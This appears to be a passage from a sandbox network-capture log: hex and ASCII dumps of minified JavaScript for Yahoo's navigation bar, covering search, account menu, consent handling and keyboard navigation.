3d 65 2e 74 79 70 65 3f 22 73 69 74 65 73 72 63 68 22 3a 22 69 63 6f 6e 22 2c 72 7c 7c 6c 29 7b
                                                                                                                                                                        Data Ascii: ment.querySelector(".modal-open"),a=null===(t=e.detail)||void 0===t?void 0:t.data,c=1,l=!1;if(u&&""!==u.value.trim()){if("enterKeyPressed"===e.type?a&&a.idx>=0?(s="srch-asst",l=!0,c=a.idx+1):s="kybrd":s="botSearchClicked"===e.type?"sitesrch":"icon",r||l){
                                                                                                                                                                        2023-06-02 11:13:21 UTC543INData Raw: 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 79 62 61 72 2d 6f 76 65 72 6c 61 79 22 29 29 7b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 79 62 61 72 2d 6f 76 65 72 6c 61 79 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 79 62 61 72 2d 6f 76 65 72 6c 61 79 2d 6e 6f 73 63 72 6f 6c 6c 22 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 62 65 61 63 6f 6e 43 6c 69 63 6b 26 26 74 2e 62 65 61 63 6f 6e 43 6c 69 63 6b 28 22 79 62 61 72 22 2c 22 77 65 62 73 72 63 68 22 2c 22 22 2c 7b 65 6c 6d 3a 22 65 78 70 61 6e 64 22 2c 73 75 62 73 65 63 3a 22 73 65 61 72 63 68 62 6f 78 22 2c
                                                                                                                                                                        Data Ascii: lement.classList.contains("ybar-overlay")){document.documentElement.classList.toggle("ybar-overlay"),document.body.classList.add("ybar-overlay-noscroll");"function"==typeof t.beaconClick&&t.beaconClick("ybar","websrch","",{elm:"expand",subsec:"searchbox",
                                                                                                                                                                        2023-06-02 11:13:21 UTC544INData Raw: 65 6e 65 72 28 22 73 65 61 72 63 68 42 74 6e 43 6c 69 63 6b 65 64 22 2c 79 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 5f 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 77 29 29 2c 22 68 6f 6d 65 70 61 67 65 22 21 3d 3d 69 26 26 22 6d 79 22 21 3d 3d 69 7c 7c 28 73 65 74 46 72 28 6e 29 2c 22 68 6f 6d 65 70 61 67 65 22 3d 3d 3d 69 26 26 73 65 74 54 79 70 65 42 79 51 75 65 72 79 53 74 72 69 6e 67 28 6e 29 29 2c 74 2e 73 61 76 65 43 75 72 72 65 6e 74 54 69 6d 65 72 56 61 6c 75 65 28 22 73 65 61 72 63 68 5f 61 73 73 69 73 74 5f 72 65 61 64 79 22 29 29 2c 45 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 61 70 70 3d 65
                                                                                                                                                                        Data Ascii: ener("searchBtnClicked",y),u.addEventListener("keydown",_),u.addEventListener("click",w)),"homepage"!==i&&"my"!==i||(setFr(n),"homepage"===i&&setTypeByQueryString(n)),t.saveCurrentTimerValue("search_assist_ready")),E.prototype={init:function(e){this.app=e
                                                                                                                                                                        2023-06-02 11:13:21 UTC545INData Raw: 62 65 72 2e 69 73 4e 61 4e 28 6c 29 26 26 69 3e 6c 3f 28 6b 28 22 22 2e 63 6f 6e 63 61 74 28 69 2c 22 2c 31 22 29 29 2c 21 30 29 3a 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 64 29 26 26 32 3e 64 26 26 28 6b 28 22 22 2e 63 6f 6e 63 61 74 28 69 2c 22 2c 32 22 29 29 2c 21 30 29 7d 29 28 72 29 26 26 28 75 26 26 22 22 21 3d 3d 61 26 26 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 2c 61 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 79 62 61 72 2d 65 6e 61 62 6c 65 2d 77 61 74 63 68 2d 74 6f 2d 77 61 74 63 68 22 29 2c 6e 75 6c 6c 3d 3d 3d 28 64 3d 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 2e 53 41 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 7c 7c 64 2e 61 64 64 28 22 73 61 57 54 57 22 2c 4c 29 29 7d 2c 73 61 49 6e 69 74 56
                                                                                                                                                                        Data Ascii: ber.isNaN(l)&&i>l?(k("".concat(i,",1")),!0):!Number.isNaN(d)&&2>d&&(k("".concat(i,",2")),!0)})(r)&&(u&&""!==a&&u.setAttribute("placeholder",a),n.classList.add("ybar-enable-watch-to-watch"),null===(d=window.YAHOO.SA)||void 0===d||d.add("saWTW",L))},saInitV
                                                                                                                                                                        2023-06-02 11:13:21 UTC547INData Raw: 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 2d 73 66 22 29 2c 69 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 2d 77 32 77 2d 6c 69 73 74 22 29 2c 6f 3d 6e 75 6c 6c 3b 69 66 28 74 26 26 22 74 72 75 65 22 3d 3d 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 61 45 6e 61 62 6c 65 64 22 29 29 7b 76 61 72 20 73 3d 7b 79 62 61 72 3a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 22 29 2c 73 65 61 72 63 68 42 6f 78 3a 74 2c 73 65 61 72 63 68 49 6e 70 75 74 3a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 2d 73 62 71 22 29 2c 73 65 61 72 63 68 42 6f 78 42 61 63 6b 42 75 74
                                                                                                                                                                        Data Ascii: =document.getElementById("ybar-sf"),i=document.getElementById("ybar-w2w-list"),o=null;if(t&&"true"===t.getAttribute("data-saEnabled")){var s={ybar:document.getElementById("ybar"),searchBox:t,searchInput:document.getElementById("ybar-sbq"),searchBoxBackBut
                                                                                                                                                                        2023-06-02 11:13:21 UTC548INData Raw: 6c 6d 3a 22 63 6c 6f 73 65 22 2c 70 6b 67 74 3a 22 74 6f 70 22 2c 73 75 62 73 65 63 3a 22 6e 61 76 72 61 69 6c 22 2c 69 74 63 3a 22 31 22 7d 3b 6e 26 26 74 26 26 69 26 26 28 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 34 2e 68 69 64 65 29 29 7c 7c 28 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 34 2e 68 69 64 65 29 29 2c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 34 2e 6f 70 65 6e 65 64 29 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 66 61 6c 73 65 22 29 2c 62 65 61 63 6f 6e 43 6c 69 63 6b 28 22 79 62 61 72 22 2c 73 2e 73 6c 6b 2c 22 22 2c
                                                                                                                                                                        Data Ascii: lm:"close",pkgt:"top",subsec:"navrail",itc:"1"};n&&t&&i&&(n.classList.contains("".concat(Css$4.hide))||(n.classList.add("".concat(Css$4.hide)),i.classList.remove("".concat(Css$4.opened)),t.setAttribute("aria-expanded","false"),beaconClick("ybar",s.slk,"",
                                                                                                                                                                        2023-06-02 11:13:21 UTC549INData Raw: 5f 79 62 5f 31 31 69 64 61 22 2c 22 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3a 22 5f 79 62 5f 31 71 34 6c 6c 22 2c 22 70 66 73 2d 63 6f 6e 74 61 69 6e 65 72 22 3a 22 5f 79 62 5f 31 38 69 31 63 22 2c 22 70 66 73 2d 69 66 72 61 6d 65 22 3a 22 5f 79 62 5f 31 75 6a 67 74 22 2c 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 69 6d 67 2d 73 69 67 6e 65 64 2d 6f 75 74 22 3a 22 5f 79 62 5f 31 37 6c 72 78 22 2c 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 6d 65 6e 75 22 3a 22 5f 79 62 5f 73 6b 34 31 30 22 2c 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 73 69 67 6e 65 64 2d 6f 75 74 22 3a 22 5f 79 62 5f 7a 32 65 7a 32 22 2c 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 75 73 65 72 2d 65 6d 61 69 6c 22 3a 22 5f 79 62 5f 37
                                                                                                                                                                        Data Ascii: _yb_11ida","notification-container":"_yb_1q4ll","pfs-container":"_yb_18i1c","pfs-iframe":"_yb_1ujgt","ybar-account-img-signed-out":"_yb_17lrx","ybar-account-menu":"_yb_sk410","ybar-account-menu-item-signed-out":"_yb_z2ez2","ybar-account-user-email":"_yb_7
                                                                                                                                                                        2023-06-02 11:13:21 UTC549INData Raw: 63 63 6f 75 6e 74 2d 75 73 65 72 2d 65 6d 61 69 6c 2d 6f 74 68 65 72 22 3a 22 5f 79 62 5f 70 72 38 63 69 22 2c 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 75 73 65 72 2d 6e 61 6d 65 22 3a 22 5f 79 62 5f 6f 70 61 38 33 22 2c 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 75 73 65 72 2d 73 69 67 6e 65 64 6f 75 74 22 3a 22 5f 79 62 5f 75 67 6a 77 67 22 2c 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 79 61 68 6f 6f 2d 70 6c 75 73 2d 69 6d 70 22 3a 22 5f 79 62 5f 61 35 76 72 6d 22 2c 22 79 62 61 72 2d 69 63 6f 6e 2d 61 72 72 6f 77 22 3a 22 5f 79 62 5f 76 62 36 69 75 22 2c 22 79 62 61 72 2d 69 63 6f 6e 2d 61 72 72 6f 77 2d 64 6f 77 6e 22 3a 22 5f 79 62 5f 31 33 72 77 6f 22 2c 22 79 62 61 72 2d 69 63 6f 6e 2d 61 72 72 6f 77 2d 75 70 22 3a 22 5f 79 62 5f 65 33 67 72 66 22
                                                                                                                                                                        Data Ascii: ccount-user-email-other":"_yb_pr8ci","ybar-account-user-name":"_yb_opa83","ybar-account-user-signedout":"_yb_ugjwg","ybar-account-yahoo-plus-imp":"_yb_a5vrm","ybar-icon-arrow":"_yb_vb6iu","ybar-icon-arrow-down":"_yb_13rwo","ybar-icon-arrow-up":"_yb_e3grf"
                                                                                                                                                                        2023-06-02 11:13:21 UTC551INData Raw: 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 74 2c 69 2c 6f 3b 72 65 74 75 72 6e 20 5f 5f 67 65 6e 65 72 61 74 6f 72 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 73 77 69 74 63 68 28 73 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 73 2e 74 72 79 73 2e 70 75 73 68 28 5b 30 2c 32 2c 2c 33 5d 29 2c 5b 34 2c 67 65 74 54 43 44 61 74 61 28 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 6e 3d 73 2e 73 65 6e 74 28 29 2c 74 3d 72 65 70 6c 61 63 65 47 44 50 52 28 65 2c 6e 29 2c 69 3d 72 65 70 6c 61 63 65 47 44 50 52 43 6f 6e 73 65 6e 74 28 74 2c 6e 29 2c 5b 32 2c 72 65 70 6c 61 63 65 54 69 6d 65 73 74 61 6d 70 28 69 29 5d 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 73 2e 73 65 6e 74 28 29 2c 6f 3d 22 45 72 72 6f 72 20 61 64 64 69 6e 67
                                                                                                                                                                        Data Ascii: ion(){var n,t,i,o;return __generator(this,(function(s){switch(s.label){case 0:return s.trys.push([0,2,,3]),[4,getTCData()];case 1:return n=s.sent(),t=replaceGDPR(e,n),i=replaceGDPRConsent(t,n),[2,replaceTimestamp(i)];case 2:return s.sent(),o="Error adding
                                                                                                                                                                        2023-06-02 11:13:21 UTC552INData Raw: 65 54 65 78 74 29 29 7d 63 61 74 63 68 28 65 29 7b 6e 28 65 29 7d 7d 29 29 7d 7d 29 7d 2c 6f 2e 73 65 6e 64 28 6e 2e 62 6f 64 79 29 7d 29 29 5d 7d 29 29 7d 29 29 7d 2c 79 62 61 72 46 65 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 7b 7d 29 2c 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 66 65 74 63 68 3f 66 65 74 63 68 3a 5f 69 65 46 65 74 63 68 29 28 65 2c 6e 29 7d 2c 67 65 74 72 65 71 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 65 2e 75 72 6c 2c 69 3d 65 2e 68 65 61 64 65 72 73 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 7b 7d 3a 69 3b 72 65 74 75 72 6e 20 6f 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 3d 22 58
                                                                                                                                                                        Data Ascii: eText))}catch(e){n(e)}}))}})},o.send(n.body)}))]}))}))},ybarFetch=function(e,n){return void 0===n&&(n={}),("function"==typeof window.fetch?fetch:_ieFetch)(e,n)},getreq=function(e,n){var t=e.url,i=e.headers,o=void 0===i?{}:i;return o["X-Requested-With"]="X
                                                                                                                                                                        2023-06-02 11:13:21 UTC553INData Raw: 22 29 2c 6e 2e 69 64 65 6e 74 69 66 69 65 72 3d 6e 2e 65 6d 7c 7c 6e 2e 61 6c 69 61 73 2c 6e 7d 2c 63 72 65 61 74 65 41 63 63 6f 75 6e 74 49 74 65 6d 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 74 2e 79 62 61 72 41 63 63 4d 65 6e 75 49 74 65 6d 54 65 6d 70 6c 61 74 65 2c 6f 3d 74 2e 63 72 75 6d 62 3b 69 66 28 69 29 7b 76 61 72 20 73 3d 28 6e 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 2c 72 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 69 67 6e 65 64 4f 75 74 53 74 61 74 65 22 29 2c 61 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 64 6f 6e 65 22 29 7c 7c 22 22 2c 63 3d 67 65 74 54 65 6d 70 6c 61 74 65 43 6f 6e 74 65 6e 74 28 69 29 2c 6c 3d 63 2e 63 68 69 6c 64 72 65 6e
                                                                                                                                                                        Data Ascii: "),n.identifier=n.em||n.alias,n},createAccountItemElement=function(e,n,t){var i=t.ybarAccMenuItemTemplate,o=t.crumb;if(i){var s=(n+1).toString(),r=i.getAttribute("data-signedOutState"),a=i.getAttribute("data-done")||"",c=getTemplateContent(i),l=c.children
                                                                                                                                                                        2023-06-02 11:13:21 UTC554INData Raw: 5b 22 73 69 67 6e 65 64 2d 6f 75 74 22 5d 3a 43 73 73 24 33 5b 22 73 69 67 6e 65 64 2d 69 6e 22 5d 29 2c 67 2e 69 6e 6e 65 72 54 65 78 74 3d 65 2e 66 75 6c 6c 4e 61 6d 65 7c 7c 22 22 29 3b 76 61 72 20 76 3d 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 22 2b 43 73 73 24 33 5b 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 75 73 65 72 2d 65 6d 61 69 6c 22 5d 2b 22 2c 20 2e 22 2b 43 73 73 24 33 5b 22 79 62 61 72 2d 61 63 63 6f 75 6e 74 2d 75 73 65 72 2d 65 6d 61 69 6c 2d 6f 74 68 65 72 22 5d 29 3b 76 26 26 28 76 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 32 3d 3d 3d 65 2e 73 74 61 74 65 3f 43 73 73 24 33 5b 22 73 69 67 6e 65 64 2d 6f 75 74 22 5d 3a 43 73 73 24 33 5b 22 73 69 67 6e 65 64 2d 69 6e 22 5d 29 2c 76 2e 69 6e 6e 65 72 54 65 78 74 3d 65 2e 69
                                                                                                                                                                        Data Ascii: ["signed-out"]:Css$3["signed-in"]),g.innerText=e.fullName||"");var v=l.querySelector("."+Css$3["ybar-account-user-email"]+", ."+Css$3["ybar-account-user-email-other"]);v&&(v.classList.add(2===e.state?Css$3["signed-out"]:Css$3["signed-in"]),v.innerText=e.i
                                                                                                                                                                        2023-06-02 11:13:21 UTC556INData Raw: 6e 74 61 69 6e 65 72 2c 73 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 33 5b 22 79 62 61 72 2d 6d 6f 64 2d 61 63 63 6f 75 6e 74 22 5d 2c 22 20 2e 22 29 2e 63 6f 6e 63 61 74 28 43 73 73 24 33 5b 22 79 62 61 72 2d 6c 6f 67 69 6e 2d 62 74 6e 22 5d 29 29 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 33 5b 22 79 62 61 72 2d 6d 6f 64 2d 61 63 63 6f 75 6e 74 22 5d 2c 22 20 2e 22 29 2e 63 6f 6e 63 61 74 28 43 73 73 24 33 5b 22 79 62 61 72 2d 73 69 67 6e 2d 6f 75 74 22 5d 29 29 2c 61 3d 6f 26 26 6f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 22 29 2c 63 3d 22 22 2c 6c 3d 77 69 6e 64 6f 77 2e 6c 6f 63
                                                                                                                                                                        Data Ascii: ntainer,s=document.querySelector(".".concat(Css$3["ybar-mod-account"]," .").concat(Css$3["ybar-login-btn"])),r=document.querySelector(".".concat(Css$3["ybar-mod-account"]," .").concat(Css$3["ybar-sign-out"])),a=o&&o.querySelectorAll("a"),c="",l=window.loc
                                                                                                                                                                        2023-06-02 11:13:21 UTC557INData Raw: 6e 6f 72 6d 61 6c 69 7a 65 41 6e 64 45 73 63 61 70 65 55 73 65 72 52 65 73 70 6f 6e 73 65 28 6f 2e 75 73 65 72 73 29 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 22 2e 63 6f 6e 63 61 74 28 43 73 73 24 33 5b 22 79 62 61 72 2d 75 73 65 72 2d 61 63 63 6f 75 6e 74 73 2d 6c 69 73 74 22 5d 29 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 3d 63 72 65 61 74 65 41 63 63 6f 75 6e 74 49 74 65 6d 45 6c 65 6d 65 6e 74 28 61 5b 74 5d 2c 74 2c 6e 29 3b 69 26 26 28 6e 75 6c 6c 3d 3d 63 7c 7c 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 29 2c 65 2e 6f 6e 44 65 73 74 72 6f 79 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 28 6e 75 6c 6c 3d 3d 63 7c 7c 63 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 29 7d 29 29 7d
                                                                                                                                                                        Data Ascii: normalizeAndEscapeUserResponse(o.users),c=document.querySelector(".".concat(Css$3["ybar-user-accounts-list"])),l=function(t){var i=createAccountItemElement(a[t],t,n);i&&(null==c||c.appendChild(i)),e.onDestroy((function(){i&&(null==c||c.removeChild(i))}))}
                                                                                                                                                                        2023-06-02 11:13:21 UTC558INData Raw: 28 22 3b 22 29 2c 74 3d 6e 65 77 20 4d 61 70 2c 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 2d 31 3b 69 2b 2b 29 7b 76 61 72 20 6f 3d 5f 5f 72 65 61 64 28 6e 5b 69 5d 2e 73 70 6c 69 74 28 22 3a 22 29 2c 32 29 2c 73 3d 6f 5b 30 5d 2c 72 3d 6f 5b 31 5d 3b 6e 75 6c 6c 21 3d 3d 73 26 26 22 6e 75 6c 6c 22 21 3d 3d 73 26 26 22 22 21 3d 3d 73 26 26 6e 75 6c 6c 21 3d 3d 72 26 26 22 6e 75 6c 6c 22 21 3d 3d 72 26 26 74 2e 73 65 74 28 73 2c 72 29 7d 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 74 29 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 3b 6e 75 6c 6c 3d 3d 3d 75 26 26 28 28 75 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 29 2e 73 72 63 3d 22 22 2e 63 6f 6e 63
                                                                                                                                                                        Data Ascii: (";"),t=new Map,i=0;i<n.length-1;i++){var o=__read(n[i].split(":"),2),s=o[0],r=o[1];null!==s&&"null"!==s&&""!==s&&null!==r&&"null"!==r&&t.set(s,r)}return Object.fromEntries(t)},m=function(){var s;null===u&&((u=document.createElement("iframe")).src="".conc
                                                                                                                                                                        2023-06-02 11:13:21 UTC560INData Raw: 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 22 29 3f 22 64 61 72 6b 22 3a 22 61 75 74 6f 22 29 2c 73 29 29 2c 64 2e 73 65 74 28 22 64 6f 6e 65 22 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 64 2e 73 65 74 28 22 70 73 70 69 64 22 2c 67 65 74 53 70 61 63 65 49 64 28 29 29 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 2e 6f 72 69 67 69 6e 3d 3d 3d 70 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 7b 63 6d 64 3a 22 6e 6f 6f 70 22 2c 70 61 72 61 6d 73 3a 7b 68 65 69 67 68 74 3a 22 30 70 78 22 2c 75 72 6c 3a 22 22 2c 22 64 61 74 61 2d 79 6c 6b 22 3a 22 22 7d 7d 3b 74 72 79 7b 6e 3d 4a 53 4f
                                                                                                                                                                        Data Ascii: data-color-scheme")?"dark":"auto"),s)),d.set("done",window.location.href),d.set("pspid",getSpaceId());window.addEventListener("message",(function(e){if(e.origin===p){var n=function(e){var n={cmd:"noop",params:{height:"0px",url:"","data-ylk":""}};try{n=JSO
                                                                                                                                                                        2023-06-02 11:13:21 UTC561INData Raw: 72 7d 66 75 6e 63 74 69 6f 6e 20 63 6c 6f 73 65 73 74 28 65 2c 6e 29 7b 66 6f 72 28 3b 65 26 26 65 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 44 4f 43 55 4d 45 4e 54 5f 4e 4f 44 45 5f 54 59 50 45 3b 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6d 61 74 63 68 65 73 26 26 65 2e 6d 61 74 63 68 65 73 28 6e 29 29 72 65 74 75 72 6e 20 65 3b 65 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 7d 76 61 72 20 63 6c 6f 73 65 73 74 5f 31 3d 63 6c 6f 73 65 73 74 3b 66 75 6e 63 74 69 6f 6e 20 5f 64 65 6c 65 67 61 74 65 28 65 2c 6e 2c 74 2c 69 2c 6f 29 7b 76 61 72 20 73 3d 6c 69 73 74 65 6e 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 73
                                                                                                                                                                        Data Ascii: r}function closest(e,n){for(;e&&e.nodeType!==DOCUMENT_NODE_TYPE;){if("function"==typeof e.matches&&e.matches(n))return e;e=e.parentNode}}var closest_1=closest;function _delegate(e,n,t,i,o){var s=listener.apply(this,arguments);return e.addEventListener(t,s
                                                                                                                                                                        2023-06-02 11:13:21 UTC562INData Raw: 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 3e 3d 74 68 69 73 2e 73 69 7a 65 28 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 74 3d 74 68 69 73 2e 68 65 61 64 3b 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6e 65 78 74 29 26 26 6e 3c 65 3b 29 6e 2b 3d 31 2c 74 3d 74 2e 6e 65 78 74 3b 72 65 74 75 72 6e 20 74 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 73 68 69 66 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 4c 69 73 74 4e 6f 64 65 28 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 65 61 64 3f 74 68 69 73 2e 74 61 69 6c 3f 28 6e 2e 6e 65 78 74 3d 74 68 69 73 2e 68 65 61 64 2c 74 68 69 73 2e 68 65 61 64 2e 70 72 65 76 3d 6e 2c 74 68 69 73 2e 68 65 61 64 3d 6e 29
                                                                                                                                                                        Data Ascii: pe.get=function(e){if(e>=this.size())return null;for(var n=0,t=this.head;(null==t?void 0:t.next)&&n<e;)n+=1,t=t.next;return t},e.prototype.unshift=function(e){var n=new ListNode(e);return this.head?this.tail?(n.next=this.head,this.head.prev=n,this.head=n)
                                                                                                                                                                        2023-06-02 11:13:21 UTC563INData Raw: 3f 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 41 22 3d 3d 3d 6e 2e 6e 6f 64 65 4e 61 6d 65 26 26 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 76 61 72 20 74 3d 69 2e 70 75 73 68 28 6e 29 2c 6f 3d 7b 6c 69 73 74 3a 69 2c 6e 6f 64 65 3a 74 7d 3b 65 2e 75 70 44 6f 77 6e 4d 61 70 2e 73 65 74 28 6e 2c 6f 29 7d 29 29 3a 74 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 41 22 29 3b 69 66 28 30 21 3d 3d 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6f 3d 74 5b 30 5d 2c 73 3d 69 2e 70 75 73 68 28 6f 29 2c 72 3d 7b 6c 69 73 74 3a 69 2c 6e 6f 64 65 3a 73 7d 3b 69 66 28 65 2e 6c 65 66
                                                                                                                                                                        Data Ascii: ?t.forEach((function(n){"A"===n.nodeName&&n.setAttribute("tabindex","-1");var t=i.push(n),o={list:i,node:t};e.upDownMap.set(n,o)})):t.forEach((function(n){var t=n.getElementsByTagName("A");if(0!==t.length){var o=t[0],s=i.push(o),r={list:i,node:s};if(e.lef
                                                                                                                                                                        2023-06-02 11:13:21 UTC565INData Raw: 72 65 4d 65 6e 75 49 74 65 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6d 6f 72 65 4d 65 6e 75 4c 69 6e 6b 65 64 4c 69 73 74 2e 73 68 69 66 74 28 29 3b 65 26 26 28 74 68 69 73 2e 75 70 44 6f 77 6e 4d 61 70 2e 64 65 6c 65 74 65 28 65 2e 64 61 74 61 29 2c 74 68 69 73 2e 6c 65 66 74 52 69 67 68 74 4d 61 70 2e 64 65 6c 65 74 65 28 65 2e 64 61 74 61 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 64 65 6c 65 67 61 74 65 5f 31 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 45 6c 6d 2c 22 61 22 2c 22 6b 65 79 64 6f 77 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 65 2e 5f 6b 65 79 64
